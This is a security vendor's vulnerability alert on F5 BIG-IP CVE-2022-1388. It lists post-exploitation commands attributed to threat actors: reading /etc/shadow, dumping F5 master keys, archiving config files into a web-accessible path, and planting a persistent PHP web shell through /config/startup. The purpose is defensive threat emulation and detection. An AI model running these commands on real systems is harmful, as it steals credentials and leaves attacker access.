VULN ALERT: F5 Big-IP appliances vulnerability - CVE-2022-1388

There’s a new vulnerability out there impacting F5 Big-IP appliances (CVE-2022-1388). Since SCYTHE focuses on post-exploitation, we don’t dive too deeply into the vulnerability itself. The good news (for me at least) is that this one is simple to explain:

  • Developers created an API endpoint (/mgmt/tm/util/bash) that allows the threat actor to interface with bash to run commands
  • The API endpoint does not require authentication
  • The web server servicing the API executes the commands as root

Note: technically the web server itself does not run as root, but commands on the bash endpoint are passed to a service that runs them as root (facepalm). This is largely a distinction without a difference since the end result is command execution as the root user.

This is effectively a perfect storm when it comes to exploitation. A threat actor with access to the API endpoint can run commands as root on the F5 appliance. Given the privileged position these appliances typically hold in a network, this is a near worst case scenario. The only saving grace is that the API endpoint can only be exploited from the management interface of the F5 device, which should not be exposed to the Internet. Per security researcher Jacob Baines, it appears there are only about 2,500 F5 devices with management interfaces exposed directly to the Internet.

The SCYTHE CTI team is tracking this vulnerability and one of our friends from Curated Intelligence (Germán Fernández) published post-exploitation activities taken by threat actors.

This great CTI sharing allowed SCYTHE to create an emulation plan to validate detection of this post-exploitation activity. While we wouldn’t expect EDR or other security monitoring to run on an F5 appliance, executing the emulation plan may nonetheless be useful. Security teams can use it to evaluate whether they can see post exploitation steps or simulate exploitation to create cleanup scripts.

The bash API endpoint is passed the command in the following screenshot to execute (this command is executed as one of our provided threats). Note that the endpoint already runs /bin/bash so the -c parameter can be interpreted as being passed to bash.

The individual commands run are as follows:

echo "====="
cat /etc/hostname
echo "====="
cat /etc/hosts
echo "====="
cat /etc/passwd
echo "====="
cat /etc/shadow
echo "====="
cat /etc/resolv.conf
echo "====="
f5mku -f
echo "====="
f5mku -K
echo "====="
f5mku -Z
echo "====="
mount -o rw,remount /usr
tar zcf /usr/local/www/xui/common/css/2e9928af731.css /config/* /root/.bash_history echo " /usr/local/www/xui/common/css/e9928af731css.php echo "echo \" /usr/local/www/xui/common/css/e9928af731css.php" >> /config/startup mount -o ro,remount /usr 

Most of these commands are survey commands that focus on collecting data from the epxloited device. The following table lists each command and its intended purpose.

Command Purpose
cat /etc/hostname Obtain the hostname of the device.
cat /etc/hosts Obtain the hosts file (may point to other previously unknown devices on the network).
cat /etc/passwd Obtain information about valid user accounts on the system.
cat /etc/shadow Obtain password hashes for users configured for interactive login.
cat /etc/resolv.conf Enumerate DNS server information.
f5mku -f Obtain the unit key (serial number) from the F5 device.
f5mku -K Display the master key from the device.
f5mku -Z Dump all debug information from the F5.
mount -o rw,remount /usr Mount the /usr filesystem as read/write. This is necessary to write the web shell.
tar zcf /usr/local/www/xui/common/css/2e9928af731.css /config/* /root/.bash_history Create a tar file containing all configuration files and the root user’s bash history. This information will aid the threat actor in further post-exploitation activities. The tar file is presumably transferred later by downloading it directly from the integrated web server from the F5.
echo " /usr/local/www/xui/common/css/e9928af731css.php Write a simple unauthenticated web shell to the file e9928af731css.php. The web shell executes commands from the POST variable “e9928af731” and executes them under the web server context.
echo "echo \" /usr/local/www/xui/common/css/e9928af731css.php" >> /config/startup Add the webshell command to the /config/startup script. This ensures that even if the webshell is removed, it will be restored the next time the device is rebooted.
mount -o ro,remount /usr Restore read only permissions to the /usr filesystem.

Because the F5 web server does not run as root, commands executed by the webshell will not be executed as root. It’s not entirely clear whether the threat actor is aware of this or how they will regain root privileges through remote access. The web shell will ensure the threat actor retains access to the device even after the vulnerability is patched.

Note that any system you run this threat on will have a web shell in the file  /usr/local/www/xui/common/css/e9928af731css.php. If you run the threat emulation on an actual F5 appliance, ensure this file is deleted since it provides a threat actor access to the appliance (even if you patch the underlying vulnerability).

Additionally, you’ll want to remove the file /usr/local/www/xui/common/css/2e9928af731.css since it contains sensitive data in a web accessible location.

If you have an F5 management interface exposed to the Internet, you should consider the appliance compromised. Threat actors are actively scanning for vulnerable systems and by the time you read this blog post, any unpatched system has likely been exploited. After patching an internally facing system, please coordinate with threat hunting or incident response team members to ensure the vulnerability was not exploited before patching was performed. The filenames used for the web shell and configuration data may be modified by threat actors. Careful review of web server logs (beyond the scope of this post) should reveal signs of successful exploitation.

This is the sort of CTI SCYTHE is starting to push more rapidly to help our customers evaluate their exposures in near real time. Today, we are releasing two threat emulation plans. The first emulation plan runs the commands by decoding a base64 payload into /tmp/ and executing the payload commands. The commands executed in the payload are those detailed above in the post.

Since the entire threat actor script is written as a single action in the SCYTHE platform, you are unable to observe each step. To facilitate observation of each step in the campaign, we have created a second emulation plan which steps through each command individually. If the threat emulation plan is run on a generic Linux system (as opposed to an F5 appliance), you should expect the F5 specific command “f5mku” to fail (it will not be present on the system). Additionally, the “mount” commands will likely fail on a generic Linux system since most systems don’t have a dedicated filesystem for the /usr directory. Finally, the creation of the tar file and web shell will also fail since the full directory structure is not present.

From the herd to you, happy hunting friends!

This post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.